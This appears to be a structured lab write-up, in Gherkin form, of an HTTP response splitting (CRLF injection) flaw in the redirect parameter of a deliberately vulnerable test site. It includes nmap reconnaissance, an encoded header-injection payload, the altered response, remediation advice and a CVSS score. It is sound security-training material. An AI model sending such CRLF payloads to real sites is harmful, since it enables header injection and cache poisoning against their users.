## Version 1.4.1
## language: en

Feature:
  TOE:
    Web-scanner-test-site
  Category:
    HTTP response split
  Location:
    webscantest.com/hrs/redir.php?q - URL (header)
  CWE:
    CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Get a different HTTP response from usual redirect
  Recommendation:
    Validate the data of the headings to avoid injection or cache poisoning

  Background:
  Hacker's software:
    | Name          | Version       |
    | Ubuntu        | 16.04         |
    | Firefox       | 72.0.02       |
  TOE information:
    Given I am accesing the webpage
    """
    webscantest.com/hrs/redir.php?
    """
    When I get site IP address using command "nslookup webscantest.com"
    """
    Server:     127.0.1.1
    Address:    127.0.1.1#53

    Non-authoritative answer:
    Name:    webscantest.com
    Address: 69.164.223.208
    """
    Then I can see the IP Address information
    When I run "nmap -sC -sV -oA nmap 69.164.223.208"
    Then I can see the webpage information
    And is runing on Ubuntu 14.04.2 LTS
    And is running Apache/2.4.7 (Ubuntu)
    And is powered by PHP/5.5.9

  Scenario: Normal use case
  Link that redirects to a search site inside the same page
    When I search for something in the search input
    Then I get the respective amount of results

  Scenario: Static detection
  No code given

  Scenario: Dynamic detection
    Given The request is sent by the q parameter in the URL
    Then I enter CRLF characters with the URL
    """
    webscantest.com/hrs/redir.php?q=%0d%0a
    """
    And I see redirects me to the page without any restriction
    Then I can conclude that does not sanitise the CRLF characters
    Then The application is vulnerable to HTTP response Splitting

  Scenario: Exploitation
  Insert special characters to edit the Response headers
    Given The application uses the url parameter for the redirect
    Then I want insert the follow request to the header
    """
    Connection: open
    Pragma: no-cache
    """
    And I use an online tool to codify my request
    """
    https://www.urlencoder.org/
    """
    And I have the following result
    """
    /redir.php?q=%0D%0AConnection:%20open%0D%0APragma:%20no-cache
    """
    When I send this result with the url
    Then I get the output redirected with empty parameter and Response header:
    """
    HTTP/1.1 302 Found
    Date: Tue, 28 Apr 2020 00:02:56 GMT
    Server: Apache/2.4.7 (Ubuntu)
    X-Powered-By: PHP/5.5.9-1ubuntu4.29
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate,
                   post-check=0, pre-check=0
    Pragma: no-cache
    Location: ../crosstraining/search.php?q=
    Connection: open, close
    Content-Length: 0
    Content-Type: text/html
    """
    And I see Response headers got succesfully modified
    And I can conclude the site doesn't filter special characters as line breaks

  Scenario: Remediation
  Verify if there are CRLF characters in the user input or the URL
    When I use output filters to strip malicious escape strings
    And other HTTP header keywords
    Then The webpage can prevent HTTP Response Splitting

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.3/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.9/10 (Medium) - E:F/RL:W/RC:R/
  Environmental: Unique and relevant attributes to a specific user environment
    5.8/10 (Medium) - CR:L/IR:M/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-04-27
